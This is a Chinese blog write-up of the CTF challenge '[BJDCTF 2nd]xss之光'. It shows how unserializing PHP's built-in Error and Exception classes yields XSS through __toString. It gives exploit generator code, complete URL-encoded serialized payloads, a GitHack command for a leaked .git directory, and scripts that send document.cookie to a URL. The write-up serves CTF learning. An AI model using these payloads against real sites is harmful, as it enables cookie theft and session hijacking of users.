利用php的原生类进行XSS([BJDCTF 2nd]xss之光)

最新推荐文章于 2021-03-31 20:30:48 发布
最新推荐文章于 2021-03-31 20:30:48 发布
阅读量1.6k 收藏 4
点赞数 6
分类专栏: CTF-Web Web 安全 文章标签: xss php 安全 安全漏洞 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45521281/article/details/105812056
版权

这周我做了一道利用php的原生类进行XSS的题目

文章目录


文章围绕着一个问题,如果在代码审计中有反序列化点,但是在原本的代码中找不到pop链该如何?N1CTF有一个无pop链的反序列化的题目, 其中就是找到php内置类来进行反序列化

基础知识

首先还是来回顾一下序列化中的魔术方法,下面也将以此进行研究。

当对象被创建的时候调用:__construct
当对象被销毁的时候调用:__destruct
当对象被当作一个字符串使用时候调用(不仅仅是echo的时候,比如file_exists()判断也会触发):__toString
序列化对象时就调用的方法(其返回需要是一个数组):__sleep
反序列化恢复对象时就调用的方法:__wakeup
当调用对象中不存在的方法会自动调用此方法:__call

利用__toString

__toString() 方法用于一个类被当成字符串时应怎样回应。例如 echo $obj; 应该显示些什么。此方法必须返回一个字符串

Error

适用于php7版本

Error类就是php的一个内置类用于自动自定义一个Error,在php7的环境下可能会造成一个xss漏洞,因为它内置有一个toString的方法。如果有个pop链走到一半就走不通了,不如尝试利用这个来做一个xss,其实我看到的还是有好一些cms会选择直接使用 echo 一个反序列化以后的类 的写法,前文说了当对象被当作一个字符串使用时候调用(如echo的时候)会触发__toString方法,这个也看开发人员吧,好的开发人员应该不会这么写,但也是一种挖洞的新思路(对我而言)。

XSS
开启报错的情况下:
测试代码:

<?php
$a = unserialize($_GET['yds']);
echo $a;
?>

exp:

<?php
$a = new Error("<script>alert(1)</script>");
$b = serialize($a);
echo urlencode($b);
?>

//得:O%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A13%3A%22%00Error%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A12%3A%22%00Error%00trace%22%3Ba%3A0%3A%7B%7Ds%3A15%3A%22%00Error%00previous%22%3BN%3B%7D    这就是生成的 urlencode($b)

则在URL中令
/?yds=O%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A13%3A%22%00Error%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A12%3A%22%00Error%00trace%22%3Ba%3A0%3A%7B%7Ds%3A15%3A%22%00Error%00previous%22%3BN%3B%7D
在这里插入图片描述
并成功alert
在这里插入图片描述

Exception

适用于php5、7版本

这个类利用的方式和原理和Error 类一模一样,但是适用于php5和php7,相对之下更加好用。

XSS
开启报错的情况下:
测试代码:

<?php
$a = unserialize($_GET['yds']);
echo $a;      
?>

exp:

<?php
$a = new Exception("<script>alert(1)</script>");
echo urlencode(serialize($a));
?>
//得:O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D
echo unserialize($c);

则我们在url中令:
/?yds=O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D
在这里插入图片描述
并成功alert
在这里插入图片描述

例题——[BJDCTF 2nd]xss之光

在这里插入图片描述
拿到题开头gungungun就不会了,没想到是git泄露,直接:

python GitHack.py http://a0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn/.git/

在这里插入图片描述
拿到源码:

<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);

仅看到是一个反序列化,但是不知道类啊,这就遇到了一个反序列化但没有pop链的情况,所以只能找到php内置类来进行反序列化;又发现有个echo;所以我们最好对有_toString方法的类进行反序列化;在 _toString()的原生类反序列化中,常用的是Error和Exception,Error只适于php7,Exception php5和php7都适用,这里我们查看一下题目的环境发现是php5;
由于此题是xss,所以只要xss执行window.open()就能把flag带出来,所以直接这样:

<?php
$y1ng = new Exception("<script>window.open('http://a0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn/?'+document.cookie);</script>");
echo urlencode(serialize($y1ng));
?>
//window.open 是 javaScript 打开新窗口的方法

也可以用window.location.href='url'来实现恶意跳转
<?php
$a = new Exception("<script>window.location.href='http://8ff615f3-da70-4d1a-959f-f29d817ecd90.node3.buuoj.cn'+document.cookie</script>");
echo urlencode(serialize($a));
?>

或者用alert(document.cookie)直接弹出cookie,但此题不行,可能开了httponly(见附录)。
<?php
$y1ng = new Exception("<script>alert(document.cookie)</script>");
echo urlencode(serialize($y1ng));
?>

结果为:

O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A110%3A%22%22%3Cscript%3Ewindow.open%28%27http%3A%2F%2Fa0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn%2F%3F%27%2Bdocument.cookie%29%3B%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A14%3A%22%2Fcode%2Fmain.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D

访问:

http://a0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn/?yds_is_so_beautiful=O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A109%3A%22%3Cscript%3Ewindow.open%28%27http%3A%2F%2Fa0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn%2F%3F%27%2Bdocument.cookie%29%3B%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D

在url中执行以下,flag就在cookies中
在这里插入图片描述
或在burp里在这里插入图片描述

其实这种xss的题的flag就藏在cookie里面,所以有时在控制台里面就可以直接找到:
在这里插入图片描述
这种情况很少,几乎不可能。

附录:

什么是HttpOnly?

如果cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击,窃取cookie内容,这样就增加了cookie的安全性,即便是这样,也不要将重要信息存入cookie。

zhang三
关注
专栏目录
[BJDCTF 2nd]xss之光 -wp
freerats的博客
08-04 512
打开容器就gungungun,其他啥也没有。 扫目录扫出git泄露 <?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a); 源码就这么短短三行。 一开始还想着是不是其他地方还会泄露另一部分源码,但是没找到。 参考其他wp才知道是利用php原生进行XSS 题目给的提示就是题目叫xss,说明需要xss。 echo unserialize($a); 可触发序列化中的魔术方法__toString Error 适用于php7版本 E
---------已搬运-------BUUCTF:[BJDCTF 2nd]xss之光 ------------ 反序列PHP原生的应用 -----------git小操作
Zero_Adam的博客
02-25 287
目录:一、自己做:二、不足&&收获三、学习WP 一、自己做: 就到源码泄露那里,而且我自己也不会git操作。。。 -<?php -$a = $_GET['yds_is_so_beautiful']; -echo unserialize($a); 二、不足&&收获 进一步晓得了 PHP 反序列化中的原生的应用 alert(1)不行的时候,多试试别的。什么弹cookie 啊。跳转网页啊。都试试 三、学习WP 没有的情况下,可以进行原生反序列化 参考文献:反序列化
[BJDCTF 2nd]xss之光
Yang_99的博客
08-15 265
1.git源码泄露 用githack提取源码: <?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a); 2.构造序列化脚本 题目是XSS,构造一个XSS跳转脚本, 通过参数传入,flag在cookie里 代码中没有给出来,所以我们只能使用PHP原生来序列化构造XSS,具体文章可以看:http://blog.ydspoplar.top/2020/03/17/php%E5%8F%AF%E5%88%A9%E7%94%A8%E7%9
[BJDCTF 2nd]xss之光利用php原生进行XSS
EC_Carrot的博客
12-29 563
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 知识点 有关该题目的知识点,十分建议去看看这篇大佬的文章:https://blog.csdn.net/qq_45521281/article/details/105812056 当对象被当作一个字符串使用时候调用(不仅仅是echo的时候,比如file_exists()判断也会触发):__toString 这里的原理就是利用__toString这个魔法方法
xss防御之php利用httponly防xss攻击
12-19
XSS(Cross-Site Scripting)攻击是一种常见的网络安全威胁,它允许攻击者在受害者的浏览器上执行恶意脚本。这种攻击通常发生在Web应用程序中,当应用程序未能充分验证或转义用户输入的数据,使得这些数据可以作为可...
利用Express模拟web安全之---xss的攻与防
01-26
XSS跨站脚本攻击】是Web应用中常见的安全漏洞之一,其全称为Cross Site Scripting。由于CSS(层叠样式表)的缩写相同,因此为了区分,将其缩写为XSS。攻击者利用XSS漏洞向网页中插入恶意的JavaScript代码,当用户...
2020/7/20 -[BJDCTF 2nd]xss之光 - git源码泄露、php原生反序列化
抒情诗
07-20 612
又回来了,当初看不懂,现在看起来也很nb(Exception没了解过) 首先是个git源码泄露,开始用dirsearch扫的时候很快,但全是429,后来用了-s 延迟(单位:s)选项成功扫出.git泄露。 亲自实验-s 0.5也可以,稍微快了点。用githack下载源码,index.php 内容如下所示 <?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a); 说他是反序列化吧,我没见过这种形式的,也不太清楚;说他不是反序列化
PHP漏洞全解(四)-xss跨站脚本攻击
weixin_33894992的博客
07-12 164
本文主要介绍针对PHP网站的xss跨站脚本攻击。跨站脚本攻击是通过在网页中加入恶意代码,当访问者浏览网页时恶意代码会被执行或者通过给管理员发信息 的方式诱使管理员浏览,从而获得管理员权限,控制整个网站。攻击者利用跨站请求伪造能够轻松地强迫用户的浏览器发出非故意的HTTP请求,如诈骗性的电汇 请求、修改口令和下载非法的内容等请求。 XSS(Cross Site Scripting),意为跨网站脚本...
php网站利用xss创社区,[深入学习Web安全] 深入利用XSS漏洞
weixin_33626238的博客
03-25 190
前言从这节课开始,小宅再次更改排版,希望能给大家更好的阅读体验。我们上节课就讲了XSS的基本原理其实就是HTML代码注入。这节课,我们将深入一点,学习一下HowToExploitXSS。浅析XSS利用技术XSS能干什么?在我们学习XSS利用技术之前,我们很有必要先知道XSS可以干什么?或者说有什么样的危害:·篡改页面,修改页面内容·网络钓鱼·盗取用户Cookie·劫持用户(浏览器)...
php网站利用xss创社区,PHP代码审计笔记--XSS跨站脚本
weixin_39988476的博客
03-25 202
0x01 最简单的XSS输入即输出,漏洞代码示例:测试语句:?id=alert(/xss/)安全建议:将输出到页面的参数转义为html实体编码。0x02 编码解码编码解码输出时,可能导致XSS编码绕过的情况。漏洞代码示例:测试语句:id=%25253Cscript%25253Ealert(/xss/)%25253C/script%25253E这边代码逻辑中,问题根源在于最后一句的url解码输出,导...
xss sql注入 php,利用xss 执行sql注入
weixin_27244795的博客
03-31 207
看见phpcms v9.1.15爆的xss和无权限的sql注入,于是就想测试下利用xss执行sql注入,虽然爆的这个phpcms漏洞还有很多其他的用法!但是,这个注入我没有找到phpcms v9.1.15测试,其他版本都没有测试成功!于是乎我只有假想下一个极端环境:1.前台有且只有一个xss漏洞(不能获取管理员cookie)2.后台有且只有一个sql注入漏洞(注入漏洞文件只有管理员可以访问)3.注...
php web基础教程之xss攻击
xiao_qing_ge的博客
12-20 285
先介绍一下xss攻击是什么: XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和co...
PHP网页xss攻击测试用例,Web应用进行XSS漏洞测试
weixin_35794072的博客
03-22 432
Web应用进行XSS漏洞测试发表于:2015-09-16来源:uml.org.cn作者:火龙果软件点击数:266对 WEB 应用进行 XSS 漏洞测试,不能仅仅局限于在 WEB 页面输入 XSS 攻击字段,然后提交。绕过 JavaScript 的检测,输入 XSS 脚本,通常被测试人员忽略。下图为 XSS 恶意输入绕过 JavaScript 检对 WEB 应用进行 XSS 漏洞测试,不能仅仅局限于...
反序列化之PHP原生利用
weixin_30678821的博客
06-26 344
目录 基础知识 __call SoapClient __toString Error Exception 实例化任意 正文 文章围绕着一个问题,如果在代码审计中有反序列化点,但是在原本的代码中找不到pop链该如何? N1CTF有一个无pop链的反序列化的题目,其中就是找到php内置进行反序列化。 回到顶部 基础知识 首先...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值